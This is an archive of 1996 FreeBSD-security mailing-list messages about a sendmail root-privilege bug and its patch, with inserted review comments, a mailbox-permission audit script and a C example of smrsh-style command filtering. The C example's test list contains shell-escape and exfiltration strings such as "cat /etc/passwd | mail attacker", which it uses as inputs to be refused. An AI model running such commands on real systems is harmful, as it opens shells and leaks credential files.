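            findings.append((name, "no such user; stale mailbox"))
        elif st.st_uid != uid:
            findings.append((name, f"owned by uid {st.st_uid}, expected uid {uid}"))
        if st.st_gid != delivery_gid:
            findings.append((name, f"group {st.st_gid} is not the delivery group {delivery_gid}"))
        perm = stat.S_IMODE(st.st_mode)
        if perm & 0o007:
            findings.append((name, f"mode {perm:04o} is accessible to everyone"))
        elif perm != MAILBOX_MODE:
            findings.append((name, f"mode {perm:04o}, expected {MAILBOX_MODE:04o}"))
    return findings


def demo() -> List[Tuple[str, str]]:
    """Build a scratch spool with constructed mailboxes and audit it."""
    spool = tempfile.mkdtemp(prefix="spool-demo-")
    me, delivery_gid = os.getuid(), os.getgid()   # stand-ins for the users' uids and the "smtp" gid
    users = {"alice": me, "bob": me, "carol": me, "erin": me}   # constructed uid table; no "dave"
    try:
        def mailbox(name: str, mode: int) -> None:
            path = os.path.join(spool, name)
            with open(path, "w"):          # empty mbox, as an adduser script would create it
                pass
            os.chmod(path, mode)

        mailbox("alice", 0o660)            # the intended layout: no finding
        mailbox("bob", 0o666)              # world-writable: anyone can forge or truncate
        os.symlink(os.path.join(spool, "alice"), os.path.join(spool, "carol"))  # planted link
        mailbox("dave", 0o660)             # no such user any more
        mailbox("erin", 0o600)             # delivery group cannot write: delivery would fail
        return audit_spool(spool, users, delivery_gid)
    finally:
        shutil.rmtree(spool)


if __name__ == "__main__":
    for mailbox_name, problem in demo():
        print(f"{mailbox_name}: {problem}")
```

The audit uses `os.lstat` deliberately: the same file a delivery agent would open must be inspected without following links, otherwise the check itself becomes the thing that follows the planted symlink.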
From: Michael Smith
Message-Id: <199611180335.OAA17231@genesis.atrad.adelaide.edu.au>
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To: from Warner Losh at "Nov 17, 96 07:55:10 pm"
To: imp@village.org (Warner Losh)
Date: Mon, 18 Nov 1996 14:05:04 +1030 (CST)
Cc: newton@communica.com.au, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.org

Warner Losh stands accused of saying:
>
> I don't buy this.  You need to be able to create a mailbox of an
> arbitrary user, and then write to that mailbox with that user's uid,
> or to a shell of that user's uid.  To do otherwise would introduce
> other security problems, some of which have been beat to death in the
> freebsd lists.
>
> What am I missing?

mail.local.

Mark's sense of warmth is perhaps slightly over-smug, but his point is
valid.  In fact, if it were possible to be non-root and bind to port 25,
then sendmail could be run non-root in daemon mode and not be called from
cron (which Mark omitted to mention).

> Warner

--
]] Mike Smith, Software Engineer        msmith@gsoft.com.au             [[
]] Genesis Software                     genesis@gsoft.com.au            [[
]] High-speed data acquisition and      (GSM mobile) 0411-222-496       [[
]] realtime instrument control.         (ph) +61-8-8267-3493            [[
]] Unix hardware collector.             "Where are your PEZ?"
The Tick [[ From owner-freebsd-security Sun Nov 17 19:40:11 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA05797 for security-outgoing; Sun, 17 Nov 1996 19:40:11 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id TAA05766 for ; Sun, 17 Nov 1996 19:40:04 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id WAA10831; Sun, 17 Nov 1996 22:35:08 -0500 
From: Adam Shostack Message-Id: <199611180335.WAA10831@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <199611180335.OAA17231@genesis.atrad.adelaide.edu.au> from Michael Smith at "Nov 18, 96 02:05:04 pm" To: msmith@atrad.adelaide.edu.au (Michael Smith) Date: Sun, 17 Nov 1996 22:35:07 -0500 (EST) Cc: freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk smap/smapd (from the TIS firewall toolkit) can handle mail delivery services & binding to port 25. They're designed for security. Adam Michael Smith wrote: | Warner Losh stands accused of saying: | > I don't buy this. You need to be able to create a mailbox of an | > arbitrary user, and then write to that mailbox with that user's uid, | > or to a shell of that user's uid. To do otherwise would introduce | > other security problems, some of which have been beat to death in the | > freebsd lists. | > What am I missing? | mail.local. | | Mark's sense of warmth is perhaps slightly over-smug, but his point is | valid. In fact, if it were possible to be non-root and bind to port 25, | then sendmail could be run non-root in daemon mode and not be called from | cron (which Mark omitted to mention). -- "It is seldom that liberty of any kind is lost all at once." 
-Hume

From owner-freebsd-security Sun Nov 17 19:42:06 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA05912 for security-outgoing; Sun, 17 Nov 1996 19:42:06 -0800 (PST)
Received: from knecht.Sendmail.ORG (root@knecht.oxford.reference.com [205.217.47.98]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA05892; Sun, 17 Nov 1996 19:41:50 -0800 (PST)
Received: from knecht.Sendmail.ORG (eric@LOCALHOST [127.0.0.1]) by knecht.Sendmail.ORG (8.8.3/8.8.3) with ESMTP id TAA21895; Sun, 17 Nov 1996 19:42:59 -0800 (PST)
Message-Id: <199611180342.TAA21895@knecht.Sendmail.ORG>
X-Mailer: exmh version 1.6.7 5/3/96
To: igor@alecto.physics.uiuc.edu (Igor Roshchin)
From: Eric Allman
X-URL: http://WWW.InReference.COM/~eric
cc: roberto@keltia.freenix.fr (Ollivier Robert), freebsd-security@freebsd.org, freebsd-hackers@freebsd.org
Subject: Re: New sendmail bug...
In-reply-to: Mail from igor@alecto.physics.uiuc.edu (Igor Roshchin) dated Sun, 17 Nov 1996 21:12:33 CST <199611180312.VAA27437@alecto.physics.uiuc.edu>
Date: Sun, 17 Nov 1996 19:42:58 -0800
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

This patch is against 8.8.2, not 8.7.6. You need to upgrade to 8.8; 8.7.x is no longer supported.

eric

============= In Reply To: ===========================================
:
From: igor@alecto.physics.uiuc.edu (Igor Roshchin) : Subject: Re: New sendmail bug... : Date: Sun, 17 Nov 1996 21:12:33 -0600 (CST) : Hello! : : May be I am missing something, : but I was not able to compile the patched version : of the sendmail 8.7.6.4, : as it appears in FreeBSD distribution (sup.freebsd.org). : : main.o: Undefined symbol `_vendor_daemon_setup' referenced from text segment : *** Error code 1 : : : Is it a problem due to the version of FreeBSD ? : I tried it on 2.1.5-stable and 2.1.5-release; - : results were the same. : : Thanks in advance for your suggestions. : : IgoR : : : > : > ------- main.c ------- : > *** - Wed Dec 31 16:00:00 1969 : > --- main.c Sat Nov 16 07:07:17 1996 : > *************** : > *** 493,507 **** : > { : > case MD_DAEMON: : > case MD_FGDAEMON: : > ! # ifdef DAEMON : > ! if (RealUid != 0) : > ! { : > ! usrerr("Permission denied"); : > ! exit(EX_USAGE); : > ! } : > ! vendor_daemon_setup(CurEnv); : > ! /* fall through ... */ : > ! # else : > usrerr("Daemon mode not implemented"); : > ExitStat = EX_USAGE; : > break; : > --- 493,499 ---- : > { : > case MD_DAEMON: : > case MD_FGDAEMON: : > ! # ifndef DAEMON : > usrerr("Daemon mode not implemented"); : > ExitStat = EX_USAGE; : > break; : > *************** : > *** 899,904 **** : > --- 891,904 ---- : > /* fall through ... 
*/ : > : > case MD_DAEMON: : > + /* check for permissions */ : > + if (RealUid != 0) : > + { : > + usrerr("Permission denied"); : > + exit(EX_USAGE); : > + } : > + vendor_daemon_setup(CurEnv); : > + : > /* remove things that don't make sense in daemon mode */ : > FullName = NULL; : > GrabTo = FALSE; : > *************** : > *** 1932,1937 **** : > --- 1932,1946 ---- : > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); : > #endif : > releasesignal(SIGHUP); : > + if (setuid(RealUid) < 0 || setgid(RealGid) < 0) : > + { : > + #ifdef LOG : > + if (LogLevel > 0) : > + syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m", : > + RealUid, RealGid); : > + #endif : > + exit(EX_OSERR); : > + } : > execv(SaveArgv[0], (ARGV_T) SaveArgv); : > #ifdef LOG : > if (LogLevel > 0) : > : > : From owner-freebsd-security Sun Nov 17 19:45:45 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id TAA06161 for security-outgoing; Sun, 17 Nov 1996 19:45:45 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id TAA06156 for ; Sun, 17 Nov 1996 19:45:37 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id TAA14598; Sun, 17 Nov 1996 19:44:30 -0800 (PST) 
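Review bot: the first hunk of the main.c patch quoted above (the `*** 493,507 ****` region) turns `# ifdef DAEMON ... # else` into `# ifndef DAEMON`, which deletes the `if (RealUid != 0) { usrerr("Permission denied"); exit(EX_USAGE); }` check and the `vendor_daemon_setup(CurEnv)` call from the `-b` option switch; applied alone it lets a non-root caller select daemon mode with no check at all, and it is only correct together with the second hunk, which re-adds both in the later `case MD_DAEMON:` block. Treat the two hunks as one unit and never hand-apply the first without the second.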
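Review bot: in the second hunk (the `*** 899,904 ****` region) the added `vendor_daemon_setup(CurEnv);` refers to a function that 8.7.6 does not have, which is exactly the `main.o: Undefined symbol '_vendor_daemon_setup'` link error Igor reports in the message above; anyone carrying this to 8.7.x has to supply an empty vendor_daemon_setup() or drop that single line, while keeping the `if (RealUid != 0)` test and the `exit(EX_USAGE)` in front of it, since that test is now the only thing keeping non-root users out of daemon mode. The visible `/* fall through ... */` means foreground daemon mode (MD_FGDAEMON) still lands in this block, so the moved check covers both daemon modes, but it now runs later in main() than the check it replaces, so nothing between the option switch and this point may rely on the caller being root.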
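Review bot: in the third hunk (the `*** 1932,1937 ****` region) the order in `if (setuid(RealUid) < 0 || setgid(RealGid) < 0)` is backwards: the group id has to be changed while the process is still root, because once setuid() has moved it to a non-root uid a setgid() to a gid it does not already hold fails with EPERM. The `||` short-circuit makes the mistake fail-closed rather than fail-open, since the LOG_ALERT syslog() and `exit(EX_OSERR)` run before `execv(SaveArgv[0], (ARGV_T) SaveArgv)` and the restart is abandoned instead of re-executing as root, but the drop should read `setgid(RealGid) < 0 || setuid(RealUid) < 0`, with the `could not set[ug]id(%d, %d)` message printing the ids in that same order. Verifying the drop with getuid()/geteuid() before the execv() would also catch a saved uid of 0 that setuid() left behind on systems where it does not reset all three ids.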
From: Don Lewis
Message-Id: <199611180344.TAA14598@salsa.gv.ssi1.com>
Date: Sun, 17 Nov 1996 19:44:30 -0800
In-Reply-To: newton@communica.com.au (Mark Newton) "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 1:17pm)
X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95)
To: newton@communica.com.au (Mark Newton), batie@agora.rdrop.com (Alan Batie)
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
Cc: imp@village.org, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

On Nov 18, 1:17pm, Mark Newton wrote:
} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
} sendmail really only needs root so that it can bind to the "privileged"
} port 25 when it's running in daemon mode.

Some flavors of sendmail close this socket when the load average gets too high to refuse incoming mail, then re-open it later.

} If you frob filesystem permissions
} sufficiently you can get away without providing sendmail with root
} privileges by running it with a non-root uid out of inetd (which is,
} indeed, precisely what I have done with it here at Communica, where
} sendmail runs as the unprivileged "smtp" user).

If your users run programs (like vacation) from their .forward files, sendmail runs these processes under their uids.

If you're in an environment where no local delivery is done, then you can hack sendmail to setuid(harmless) right after it fork()s, which should eliminate a lot of the danger, though not the latest problem :-(.
--- Truck From owner-freebsd-security Sun Nov 17 20:10:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA07639 for security-outgoing; Sun, 17 Nov 1996 20:10:07 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA07614 for ; Sun, 17 Nov 1996 20:09:52 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id UAA14636; Sun, 17 Nov 1996 20:09:02 -0800 (PST) 
From: Don Lewis Message-Id: <199611180409.UAA14636@salsa.gv.ssi1.com> Date: Sun, 17 Nov 1996 20:09:01 -0800 In-Reply-To: newton@communica.com.au (Mark Newton) "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 1:42pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: newton@communica.com.au (Mark Newton), imp@village.org (Warner Losh) Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 1:42pm, Mark Newton wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } Garbage. You can create the mailbox at the same time that you create } the user (as part of the adduser script). Set the mailbox's gid to } "smtp" and run sendmail with the "smtp" gid Some MUAs delete empty mailboxes. I think they're broken, but ... } (actually, I don't do this } on our gateway machine at Communica: Nobody ever logs in to it, nobody } ever receives mail on it, sendmail is configured to forward "local" mail } to an internal host; special privileges to write local mailboxes aren't } needed, so sendmail doesn't get them given to it). I'm in the process of building a machine with a very similar configuration. It'll help me sleep a lot better. } > or to a shell of that user's uid. } } You allow shell escapes? I prefer an administrative model where the } system administrator gets to decide who can run programs on the local } host, rather than the users themselves. You don't let pleb users create } files in a system's cgi-bin directory, why should you let them run } commands out of their .forward files? Isn't sendmail a program used for } transferring mail, rather than a program used to allow any user on the } Internet to execute arbitrary commands on your system? 
You can limit the damage by configuring sendmail to use smrsh so that it can only run those programs that you believe are safe.

--- Truck

From owner-freebsd-security Sun Nov 17 20:19:36 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA07922 for security-outgoing; Sun, 17 Nov 1996 20:19:36 -0800 (PST)
Received: from panda.hilink.com.au (panda.hilink.com.au [203.2.144.5]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA07907 for ; Sun, 17 Nov 1996 20:19:09 -0800 (PST)
Received: (from danny@localhost) by panda.hilink.com.au (8.7.6/8.7.3) id PAA07530; Mon, 18 Nov 1996 15:18:19 +1100 (EST)
Date: Mon, 18 Nov 1996 15:18:14 +1100 (EST)
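[ Added example, not part of any message in this archive and not smrsh(8) or sendmail source. It shows the kind of check Don Lewis's smrsh suggestion above relies on: a .forward command line is refused if it contains shell metacharacters, its program name is reduced to a basename, and that name must be one of a fixed set of programs that then run from a fixed directory. The directory name SMRSH_DIR and the ALLOWED list are assumptions standing in for the program directory the real smrsh consults. ]

```c
/* Added example, not smrsh(8) or sendmail source: the checks a restricted
 * shell applies to a .forward command line before handing it to sh -c.
 * SMRSH_DIR and the ALLOWED list stand in for the program directory smrsh
 * really consults; both are assumptions made for this example. */
#include <stdio.h>
#include <string.h>

#define SMRSH_DIR "/usr/libexec/sm.bin"
static const char *const ALLOWED[] = { "vacation", "procmail", NULL };

/* Anything that would let sh(1) start a second command, substitute a
 * command, or redirect I/O is refused outright, wherever it appears. */
static const char BAD_CHARS[] = "`<>|;&$\r\n";

/* Validate cmdline and write the command actually to be run into out.
 * The program name is reduced to its basename and re-anchored under
 * SMRSH_DIR, so "/bin/sh", "../sh" and "vacation; sh" all fail while
 * "/usr/bin/vacation -j user" becomes SMRSH_DIR "/vacation -j user".
 * Returns 1 when out is valid, 0 when the command must be refused. */
int smrsh_check(const char *cmdline, char *out, size_t outlen)
{
    if (cmdline[strcspn(cmdline, BAD_CHARS)] != '\0')
        return 0;                              /* shell metacharacter */
    while (*cmdline == ' ' || *cmdline == '\t')
        cmdline++;
    const char *end = cmdline + strcspn(cmdline, " \t"); /* end of argv[0] */
    const char *base = end;
    while (base > cmdline && base[-1] != '/')
        base--;                                /* basename of argv[0] */
    size_t blen = (size_t)(end - base);
    if (blen == 0)
        return 0;                              /* empty command */
    int allowed = 0;
    for (const char *const *p = ALLOWED; *p != NULL; p++)
        if (strlen(*p) == blen && memcmp(*p, base, blen) == 0)
            allowed = 1;
    if (!allowed)
        return 0;                              /* not in the program dir */
    size_t dlen = strlen(SMRSH_DIR) + 1;       /* directory plus '/' */
    if (dlen + blen + strlen(end) + 1 > outlen)
        return 0;                              /* would not fit */
    memcpy(out, SMRSH_DIR "/", dlen);
    memcpy(out + dlen, base, blen);
    strcpy(out + dlen + blen, end);            /* original arguments */
    return 1;
}

int main(void)
{
    /* Constructed .forward command lines: the first two are what users
     * legitimately write, the rest are the escapes smrsh exists to stop. */
    static const char *const lines[] = {
        "/usr/bin/vacation -j user",
        "procmail",
        "vacation; /bin/sh",
        "/bin/sh -c 'cat /etc/passwd'",
        "cat /etc/passwd | mail attacker",
        "/usr/libexec/sm.bin/../../../bin/sh",
    };
    char out[256];
    for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
        if (smrsh_check(lines[i], out, sizeof out))
            printf("accept: %-40s -> %s\n", lines[i], out);
        else
            printf("refuse: %s\n", lines[i]);
    }
    return 0;
}
```

The metacharacter test runs before anything else on purpose: a command line is rejected as a whole, not sanitised, because quoting rules differ between shells and a filter that tries to be clever is the thing that gets bypassed. Re-anchoring the basename under SMRSH_DIR is what makes the user's own path (including "../") irrelevant.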
From: "Daniel O'Callaghan" To: Mark Newton cc: freebsd-security@freebsd.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: <9611180247.AA15359@communica.com.au> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Mon, 18 Nov 1996, Mark Newton wrote: > Of course, one of the main reasons why sendmail is so "dangerous" is that > despite fifteen years of it-hurts-when-I-do-this style experience, we *still* > run it as root! Why do we do this? Why does nobody understand that a UNIX > process can't just gratuitously gain privileges unless some other privileged > program gives them away? Given sendmail's history, why do so many people > still trust it with root privileges when it doesn't actually need them?! > > sendmail really only needs root so that it can bind to the "privileged" > port 25 when it's running in daemon mode. If you frob filesystem permissions > sufficiently you can get away without providing sendmail with root > privileges by running it with a non-root uid out of inetd (which is, > indeed, precisely what I have done with it here at Communica, where > sendmail runs as the unprivileged "smtp" user). I've been thinking about this, too. Why *does* sendmail need to run as root? a) to bind to port 25 (fixable with inetd, and other ways) b) to operate on the mail queue (fixable with a group 'mail' or somesuch) c) to deliver local mail - nope, /usr/libexec/mail.local is suid root to do this. Are there any other reasons? 
Danny From owner-freebsd-security Sun Nov 17 20:20:41 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA08025 for security-outgoing; Sun, 17 Nov 1996 20:20:41 -0800 (PST) Received: from scanner.worldgate.com (scanner.worldgate.com [198.161.84.3]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA08015 for ; Sun, 17 Nov 1996 20:20:32 -0800 (PST) Received: from znep.com (uucp@localhost) by scanner.worldgate.com (8.7.5/8.7.3) with UUCP id VAA21852; Sun, 17 Nov 1996 21:20:19 -0700 (MST) Received: from localhost (marcs@localhost) by alive.ampr.ab.ca (8.7.5/8.7.3) with SMTP id VAA00293; Sun, 17 Nov 1996 21:18:30 -0700 (MST) Date: Sun, 17 Nov 1996 21:18:29 -0700 (MST) 
From: Marc Slemko
X-Sender: marcs@alive.ampr.ab.ca
To: Андрей Чернов
cc: freebsd-security@FreeBSD.org
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To: <199611180225.FAA01413@nagual.ru>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Content-Transfer-Encoding: QUOTED-PRINTABLE
Sender: owner-security@FreeBSD.org
X-Loop: FreeBSD.org
Precedence: bulk

Incorrect. Sendmail still attempts a lookup for something, I think it is the local hostname, for each piece of mail it processes. Last I checked, this could NOT be disabled without recompiling sendmail. Modifying your config file or adding a service.switch file does not stop it.

Normally this isn't a problem without DNS since the query will fail right away and sendmail will go on its happy way, but it is a big problem when you have a machine with some type of dial on demand networking setup that gets mail via uucp.

Followups should go somewhere more appropriate, perhaps hackers if it is remotely technical or chat if not.

On Mon, 18 Nov 1996, [KOI8-R] Андрей Чернов wrote:

> > Sendmail's support of UUCP isn't wonderful (mostly a problem of
> > getting DNS totally disabled). How well does qmail support UUCP?
>
> It is possible to totally disable DNS via
>
> /etc/service.switch:
> # To disable DNS search for sendmail
> hosts files
>
>
> --
> Andrey A. Chernov
> > http://www.nagual.ru/~ache/
>

From owner-freebsd-security Sun Nov 17 20:37:40 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA08729 for security-outgoing; Sun, 17 Nov 1996 20:37:40 -0800 (PST)
Received: from offensive.communica.com.au (offensive-eth1.adl.communica.com.au [192.82.222.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA08686 for ; Sun, 17 Nov 1996 20:37:06 -0800 (PST)
Received: from communica.com.au (frenzy.communica.com.au [192.82.222.65]) by offensive.communica.com.au (8.7.6/8.7.3) with SMTP id PAA14708; Mon, 18 Nov 1996 15:06:07 +1030 (CST)
Received: by communica.com.au (4.1/SMI-4.1) id AA17191; Mon, 18 Nov 96 15:05:39 CDT
From: newton@communica.com.au (Mark Newton) Message-Id: <9611180435.AA17191@communica.com.au> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: msmith@atrad.adelaide.edu.au (Michael Smith) Date: Mon, 18 Nov 1996 15:05:38 +1030 (CST) Cc: imp@village.org, newton@communica.com.au, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.ORG In-Reply-To: <199611180335.OAA17231@genesis.atrad.adelaide.edu.au> from "Michael Smith" at Nov 18, 96 02:05:04 pm X-Mailer: ELM [version 2.4 PL21] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 8bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Michael Smith wrote: > Mark's sense of warmth is perhaps slightly over-smug, Have you ever known me to be any different? :-) > but his point is > valid. In fact, if it were possible to be non-root and bind to port 25, That's a wonderful point: The only reason sendmail needs root to bind to port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP ports less than 1024 can only be allocated by a privileged user. TCP/IP implementations on non-UNIX platforms disagree violently with this assumption, which makes the value of this "security" feature rather dubious. It would be foolish of me to argue to have it changed, though :-) > then sendmail could be run non-root in daemon mode and not be called from > cron (which Mark omitted to mention). That would have allowed a user to obtain a setuid shell owned by the "smtp" user by exploiting the latest bug. While not as serious as a root shell, I'm still not wonderfully happy about the possibility. 
- mark

---
Mark Newton                               Email:  newton@communica.com.au
Systems Engineer                          Phone:  +61-8-8373-2523
Communica Systems                         WWW:    http://www.communica.com.au

From owner-freebsd-security Sun Nov 17 20:41:39 1996
Return-Path: owner-security
Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA08906 for security-outgoing; Sun, 17 Nov 1996 20:41:39 -0800 (PST)
Received: from super-g.inch.com (spork@super-g.com [204.178.32.161]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA08872; Sun, 17 Nov 1996 20:41:14 -0800 (PST)
Received: from localhost (spork@localhost) by super-g.inch.com (8.7.6/8.6.9) with SMTP id WAA15352; Sun, 17 Nov 1996 22:39:11 -0500
Date: Sun, 17 Nov 1996 21:39:11 -0600 (CST)
From: "S(pork)"
X-Sender: spork@super-g.inch.com
To: Eric Allman
cc: Igor Roshchin , Ollivier Robert , freebsd-security@freebsd.org, freebsd-hackers@freebsd.org
Subject: Re: New sendmail bug...
In-Reply-To: <199611180342.TAA21895@knecht.Sendmail.ORG>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-security@freebsd.org
X-Loop: FreeBSD.org
Precedence: bulk

But if one does have to run 8.7.6 until they have time to breathe, does anyone know if the error that Igor and I are seeing compiling 8.7.6 from -stable can be avoided? I first patched with the 2 line setgid, setuid patch I saw on the list, then I grabbed what was in the current -stable source and got the same error as Igor. It compiled after deleting the line in main.c that I saw in the errors, and it seems to work, but reckless deletion scares me. I wonder what the line was for....

Anyhow, any help is appreciated.

Thanks,

Charles

On Sun, 17 Nov 1996, Eric Allman wrote:

> This patch is against 8.8.2, not 8.7.6. You need to upgrade to 8.8;
> 8.7.x is no longer supported.
>
> eric
>
>
> ============= In Reply To: ===========================================
> :
From: igor@alecto.physics.uiuc.edu (Igor Roshchin) > : Subject: Re: New sendmail bug... > : Date: Sun, 17 Nov 1996 21:12:33 -0600 (CST) > > : Hello! > : > : May be I am missing something, > : but I was not able to compile the patched version > : of the sendmail 8.7.6.4, > : as it appears in FreeBSD distribution (sup.freebsd.org). > : > : main.o: Undefined symbol `_vendor_daemon_setup' referenced from text segment > : *** Error code 1 > : > : > : Is it a problem due to the version of FreeBSD ? > : I tried it on 2.1.5-stable and 2.1.5-release; - > : results were the same. > : > : Thanks in advance for your suggestions. > : > : IgoR > : > : > : > > : > ------- main.c ------- > : > *** - Wed Dec 31 16:00:00 1969 > : > --- main.c Sat Nov 16 07:07:17 1996 > : > *************** > : > *** 493,507 **** > : > { > : > case MD_DAEMON: > : > case MD_FGDAEMON: > : > ! # ifdef DAEMON > : > ! if (RealUid != 0) > : > ! { > : > ! usrerr("Permission denied"); > : > ! exit(EX_USAGE); > : > ! } > : > ! vendor_daemon_setup(CurEnv); > : > ! /* fall through ... */ > : > ! # else > : > usrerr("Daemon mode not implemented"); > : > ExitStat = EX_USAGE; > : > break; > : > --- 493,499 ---- > : > { > : > case MD_DAEMON: > : > case MD_FGDAEMON: > : > ! # ifndef DAEMON > : > usrerr("Daemon mode not implemented"); > : > ExitStat = EX_USAGE; > : > break; > : > *************** > : > *** 899,904 **** > : > --- 891,904 ---- > : > /* fall through ... 
*/ > : > > : > case MD_DAEMON: > : > + /* check for permissions */ > : > + if (RealUid != 0) > : > + { > : > + usrerr("Permission denied"); > : > + exit(EX_USAGE); > : > + } > : > + vendor_daemon_setup(CurEnv); > : > + > : > /* remove things that don't make sense in daemon mode */ > : > FullName = NULL; > : > GrabTo = FALSE; > : > *************** > : > *** 1932,1937 **** > : > --- 1932,1946 ---- > : > syslog(LOG_INFO, "restarting %s on signal", SaveArgv[0]); > : > #endif > : > releasesignal(SIGHUP); > : > + if (setuid(RealUid) < 0 || setgid(RealGid) < 0) > : > + { > : > + #ifdef LOG > : > + if (LogLevel > 0) > : > + syslog(LOG_ALERT, "could not set[ug]id(%d, %d): %m", > : > + RealUid, RealGid); > : > + #endif > : > + exit(EX_OSERR); > : > + } > : > execv(SaveArgv[0], (ARGV_T) SaveArgv); > : > #ifdef LOG > : > if (LogLevel > 0) > : > > : > > : > > > From owner-freebsd-security Sun Nov 17 20:46:37 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id UAA09281 for security-outgoing; Sun, 17 Nov 1996 20:46:37 -0800 (PST) Received: from genesis.atrad.adelaide.edu.au (genesis.atrad.adelaide.edu.au [129.127.96.120]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id UAA09261 for ; Sun, 17 Nov 1996 20:46:27 -0800 (PST) Received: (from msmith@localhost) by genesis.atrad.adelaide.edu.au (8.8.2/8.7.3) id PAA17729; Mon, 18 Nov 1996 15:16:22 +1030 (CST) 
From: Michael Smith
Message-Id: <199611180446.PAA17729@genesis.atrad.adelaide.edu.au>
Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2).
In-Reply-To: <9611180435.AA17191@communica.com.au> from Mark Newton at "Nov 18, 96 03:05:38 pm"
To: newton@communica.com.au (Mark Newton)
Date: Mon, 18 Nov 1996 15:16:21 +1030 (CST)
Cc: security@FreeBSD.ORG
X-Mailer: ELM [version 2.4ME+ PL28 (25)]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Sender: owner-security@FreeBSD.ORG
X-Loop: FreeBSD.org
Precedence: bulk

Mark Newton stands accused of saying:
> Michael Smith wrote:
>
> > Mark's sense of warmth is perhaps slightly over-smug,
>
> Have you ever known me to be any different? :-)

Ah well, I guess not. (I guess my Pringle lease has expired too. *sigh*)

> It would be foolish of me to argue to have it changed, though :-)

But no more foolish than many of your other crusades 8)

> That would have allowed a user to obtain a setuid shell owned by the
> "smtp" user by exploiting the latest bug. While not as serious as a
> root shell, I'm still not wonderfully happy about the possibility.

Perhaps. Still, I argue along similar lines to you; no users on mail machines, no mail on user machines. In fact, I think that shell accounts have very little use in most environments. (Teaching and development are about the only two left IMHO.)

> Mark Newton Email: newton@communica.com.au

--
]] Mike Smith, Software Engineer        msmith@gsoft.com.au             [[
]] Genesis Software                     genesis@gsoft.com.au            [[
]] High-speed data acquisition and      (GSM mobile) 0411-222-496       [[
